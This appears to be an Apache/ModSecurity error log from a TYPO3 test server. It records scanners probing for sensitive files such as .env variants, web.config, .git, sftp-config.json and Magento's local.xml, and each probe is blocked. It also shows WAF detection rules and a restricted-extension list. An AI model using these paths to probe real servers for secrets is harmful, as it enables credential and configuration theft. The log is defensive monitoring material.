[Tue May 13 22:09:40.407840 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aCOnBEek2plj21rmDsm9-gAAABA"]
[Tue May 13 22:09:40.437377 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aCOnBEek2plj21rmDsm9-wAAABA"]
[Tue May 13 22:09:40.437658 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aCOnBEek2plj21rmDsm9-wAAABA"]
[Tue May 13 22:09:40.437849 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aCOnBEek2plj21rmDsm9-wAAABA"]
[Tue May 13 22:09:40.467465 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aCOnBEek2plj21rmDsm9_AAAABA"]
[Tue May 13 22:09:40.467713 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aCOnBEek2plj21rmDsm9_AAAABA"]
[Tue May 13 22:09:40.467894 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aCOnBEek2plj21rmDsm9_AAAABA"]
[Tue May 13 22:09:43.970196 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue May 13 22:09:47.326868 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue May 13 22:09:47.474684 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue May 13 22:09:47.510542 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCOnC0ek2plj21rmDsm-AgAAABA"]
[Tue May 13 22:09:47.510709 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /web.config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCOnC0ek2plj21rmDsm-AgAAABA"]
[Tue May 13 22:09:47.510939 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCOnC0ek2plj21rmDsm-AgAAABA"]
[Tue May 13 22:09:47.511122 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web.config"] [unique_id "aCOnC0ek2plj21rmDsm-AgAAABA"]
[Tue May 13 22:09:47.560467 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.htaccess
[Tue May 13 22:09:47.870417 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/CHANGELOG.txt
[Tue May 13 22:09:47.919468 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aCOnC0ek2plj21rmDsm-CAAAABA"]
[Tue May 13 22:09:47.919714 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aCOnC0ek2plj21rmDsm-CAAAABA"]
[Tue May 13 22:09:47.919931 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "aCOnC0ek2plj21rmDsm-CAAAABA"]
[Tue May 13 22:09:51.734766 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue May 13 22:09:51.764406 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue May 13 22:09:51.793885 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.wp-config.php.swp
[Tue May 13 22:09:51.870886 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Tue May 13 22:09:54.718928 2025] [authz_core:error] [pid 3133909] [client 154.83.103.115:12604] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php~
[Tue May 13 22:09:57.726053 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/package.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /package.json found within REQUEST_FILENAME: /package.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aCOnFUek2plj21rmDsm-EwAAABA"]
[Tue May 13 22:09:57.726387 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aCOnFUek2plj21rmDsm-EwAAABA"]
[Tue May 13 22:09:57.726591 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/package.json"] [unique_id "aCOnFUek2plj21rmDsm-EwAAABA"]
[Tue May 13 22:09:57.759615 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Matched phrase "/yarn.lock" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /yarn.lock found within REQUEST_FILENAME: /yarn.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aCOnFUek2plj21rmDsm-FAAAABA"]
[Tue May 13 22:09:57.759930 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aCOnFUek2plj21rmDsm-FAAAABA"]
[Tue May 13 22:09:57.760136 2025] [:error] [pid 3133909] [client 154.83.103.115:12604] [client 154.83.103.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/yarn.lock"] [unique_id "aCOnFUek2plj21rmDsm-FAAAABA"]
[Fri May 16 04:07:44.628138 2025] [:error] [pid 3184837] [client 176.98.186.46:51721] [client 176.98.186.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCad8HXQfX5WyW27TAVKRwAAAAM"]
[Fri May 16 04:07:44.629739 2025] [:error] [pid 3184837] [client 176.98.186.46:51721] [client 176.98.186.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCad8HXQfX5WyW27TAVKRwAAAAM"]
[Fri May 16 04:07:44.629937 2025] [:error] [pid 3184837] [client 176.98.186.46:51721] [client 176.98.186.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCad8HXQfX5WyW27TAVKRwAAAAM"]
[Fri May 16 04:07:44.968350 2025] [:error] [pid 3184859] [client 176.98.186.46:52074] [client 176.98.186.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCad8PwlOQw-KhoMaYtVMgAAAAU"]
[Fri May 16 04:07:44.968676 2025] [:error] [pid 3184859] [client 176.98.186.46:52074] [client 176.98.186.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCad8PwlOQw-KhoMaYtVMgAAAAU"]
[Fri May 16 04:07:44.968853 2025] [:error] [pid 3184859] [client 176.98.186.46:52074] [client 176.98.186.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCad8PwlOQw-KhoMaYtVMgAAAAU"]
[Fri May 16 04:07:45.300826 2025] [:error] [pid 3184835] [client 176.98.186.46:63550] [client 176.98.186.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCad8R9cQZunkMyShbuuUgAAAAE"]
[Fri May 16 04:07:45.301067 2025] [:error] [pid 3184835] [client 176.98.186.46:63550] [client 176.98.186.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCad8R9cQZunkMyShbuuUgAAAAE"]
[Fri May 16 04:07:45.301256 2025] [:error] [pid 3184835] [client 176.98.186.46:63550] [client 176.98.186.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aCad8R9cQZunkMyShbuuUgAAAAE"]
[Fri May 16 08:05:34.353898 2025] [authz_core:error] [pid 3184837] [client 216.81.248.24:53820] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat May 17 22:36:33.338784 2025] [:error] [pid 3226371] [client 35.180.65.216:56668] [client 35.180.65.216] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aCjzUfR2fZu4qmkZInfdrAAAAA4"]
[Sat May 17 22:36:33.339898 2025] [:error] [pid 3226371] [client 35.180.65.216:56668] [client 35.180.65.216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aCjzUfR2fZu4qmkZInfdrAAAAA4"]
[Sat May 17 22:36:33.340090 2025] [:error] [pid 3226371] [client 35.180.65.216:56668] [client 35.180.65.216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sftp-config.json"] [unique_id "aCjzUfR2fZu4qmkZInfdrAAAAA4"]
[Sun May 18 19:42:32.595628 2025] [:error] [pid 3240159] [client 176.98.186.46:56877] [client 176.98.186.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCocCDippbO7RY6a2MH0lwAAAAM"]
[Sun May 18 19:42:32.595886 2025] [:error] [pid 3240159] [client 176.98.186.46:56877] [client 176.98.186.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCocCDippbO7RY6a2MH0lwAAAAM"]
[Sun May 18 19:42:32.596073 2025] [:error] [pid 3240159] [client 176.98.186.46:56877] [client 176.98.186.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aCocCDippbO7RY6a2MH0lwAAAAM"]
[Sun May 18 19:42:32.911845 2025] [:error] [pid 3240162] [client 176.98.186.46:57126] [client 176.98.186.46] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCocCKidVvYEkQknJ8nw0gAAAAU"]
[Sun May 18 19:42:32.912109 2025] [:error] [pid 3240162] [client 176.98.186.46:57126] [client 176.98.186.46] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCocCKidVvYEkQknJ8nw0gAAAAU"]
[Sun May 18 19:42:32.912328 2025] [:error] [pid 3240162] [client 176.98.186.46:57126] [client 176.98.186.46] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aCocCKidVvYEkQknJ8nw0gAAAAU"]
